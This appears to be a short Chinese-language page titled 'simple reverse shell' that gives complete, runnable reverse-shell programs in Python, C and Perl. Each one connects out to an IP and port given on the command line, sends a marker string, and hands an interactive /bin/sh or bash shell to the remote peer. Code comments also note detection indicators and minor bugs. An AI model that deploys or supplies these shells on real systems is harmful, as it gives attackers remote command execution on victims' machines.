简单的反弹shell
Python版:
#!/usr/bin/env python
#-*- coding:utf-8 -*-
'''
author: xjump
file: reverse_tcp_shell.py
usage: python reverse_tcp_shell.py remote_ip remote_port
'''
import os,sys,socket
def main():
    """Connect to remote_ip:remote_port from argv and attach /bin/sh to that socket.

    Reads the address from sys.argv[1] (IP) and sys.argv[2] (port). The usage
    line is printed only when no argument at all is given; with exactly one
    argument the guard passes and sys.argv[2] raises IndexError. Python 2
    syntax throughout (print statement, str sent on the socket).
    """
    if len(sys.argv) < 2:
        print 'Usage: python reverse_tcp_shell.py remote_ip port'
        sys.exit()
    # Applies to every socket created in this process from here on, i.e. to s.
    socket.setdefaulttimeout(5)
    ip = sys.argv[1]
    port = int(sys.argv[2])
    ADDR = (ip,port)
    s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
    try:
        s.connect((ADDR))
        print '[+] Connect OK (%s:%s)' %(ADDR)
    except:
        # Bare except: any failure here (including KeyboardInterrupt) ends the process.
        print '[+] Connect Error (%s:%s)' %(ADDR)
        sys.exit()
    # Fixed 18-byte marker is the first thing on the wire after the handshake;
    # a network sensor can match on it.
    s.send('[+] secret knock!\n')
    # Point fds 2, 0 and 1 at the socket, so the child shell's stdio is the TCP
    # connection; this process's own prints also go to the peer from now on.
    os.dup2(s.fileno(), sys.stderr.fileno())
    os.dup2(s.fileno(), sys.stdin.fileno())
    os.dup2(s.fileno(), sys.stdout.fileno())
    # Blocks until the shell exits. Host-side indicator: a /bin/sh process whose
    # stdin, stdout and stderr all resolve to one TCP socket, parented by python.
    os.system("/bin/sh")
    s.close()
if __name__ == '__main__':
    # Script entry point; nothing runs on import.
    main()
C版:
#include <stdio.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <unistd.h>
#include <fcntl.h>
#include <netinet/in.h>
#include <netdb.h>
void usage();               /* non-prototype declaration: the usage(argv[0]) call in main() is not type-checked */
char shell[]="/bin/sh";     /* program exec'd once fds 0/1/2 point at the socket */
char cmd[]="[+] secret knock!\n";   /* first bytes sent on the connection (18 chars + NUL); a fixed marker a network sensor can match */
int sclient;                /* the outbound TCP socket, file scope; used only by main() */
int main(int argc, char *argv[]) {
    /* Connect to argv[1]:argv[2], send the marker line, then replace this
     * process with /bin/sh whose stdin/stdout/stderr are the socket.
     * Returns 0 only if execl() fails; on success it never returns. */
    if(argc <3){
        usage(argv[0]);   /* usage() exits; no return here */
    }
    struct sockaddr_in srv;   /* only family, port and address are set below; the rest is left uninitialised */
    if((sclient = socket(AF_INET, SOCK_STREAM, 0)) == -1) {
        printf("[-] Couldn't make socket!\n"); exit(-1);
    }
    srv.sin_family = AF_INET;
    srv.sin_port = htons(atoi(argv[2]));      /* atoi: a non-numeric port string becomes port 0 */
    srv.sin_addr.s_addr = inet_addr(argv[1]); /* dotted-quad text only; no name resolution */
    if(connect(sclient, (struct sockaddr *)&srv, sizeof(struct sockaddr)) == -1) {
        printf("[-] Could not connect to controller!\n"); exit(-1);
    }
    /* sizeof(cmd) counts the trailing NUL, so 19 bytes go on the wire. */
    send(sclient, cmd, sizeof(cmd), 0);
    /* The socket becomes fds 0, 1 and 2, inherited by the exec'd shell. */
    dup2(sclient, 0);
    dup2(sclient, 1);
    dup2(sclient, 2);
    /* Process image is replaced by /bin/sh; sclient (and its three dups) stay
     * open in the shell. Host-side indicator: a sh process whose stdio fds are
     * one TCP socket. */
    execl(shell,"/bin/sh",(char *)0);
    /* Reached only when execl() fails. */
    close(sclient);
    return 0;
}
void usage(char *prog[]) {
    /* Print the banner and usage line, then exit(-1). The parameter is
     * declared as char *prog[] but the only caller passes argv[0] (a char *)
     * and the value is printed with %s; the mismatch is not diagnosed because
     * the forward declaration has no parameter list. */
    printf("\t\t reverse_tcp_shell v0.1 \n\n");
    printf("Usage: %s remote ip remote_port\n", prog);
    exit(-1);
}
Perl版:
#!/usr/bin/perl -w
use strict;
use Socket;
use IO::Handle;
# Exit unless exactly two arguments (remote IP, remote port) were given.
# The message starts with $#ARGV, the last index of @ARGV, then the script name.
if($#ARGV+1 != 2){
    print "$#ARGV $0 Remote_IP Remote_Port \n";
    exit 1;
}
my $remote_ip = $ARGV[0];
my $remote_port = $ARGV[1];
my $proto = getprotobyname("tcp");
# Packed sockaddr_in for the peer.
my $pack_addr = sockaddr_in($remote_port, inet_aton($remote_ip));
my $shell = '/bin/bash -i';   # command handed to system() below
socket(SOCK, AF_INET, SOCK_STREAM, $proto);   # return value is not checked
STDOUT->autoflush(1);
SOCK->autoflush(1);
connect(SOCK,$pack_addr) or die "can not connect:$!";
# Reopen the three standard handles as duplicates of SOCK, so the child
# shell's stdin/stdout/stderr are the TCP connection.
open STDIN, "<&SOCK";
open STDOUT, ">&SOCK";
open STDERR, ">&SOCK";
print "Enjoy the shell.\n";   # STDOUT is the socket now, so this reaches the peer
# Blocks until bash exits. Host-side indicator: a bash -i process whose stdio
# fds are one TCP socket, parented by perl.
system($shell);
close SOCK;
exit 0;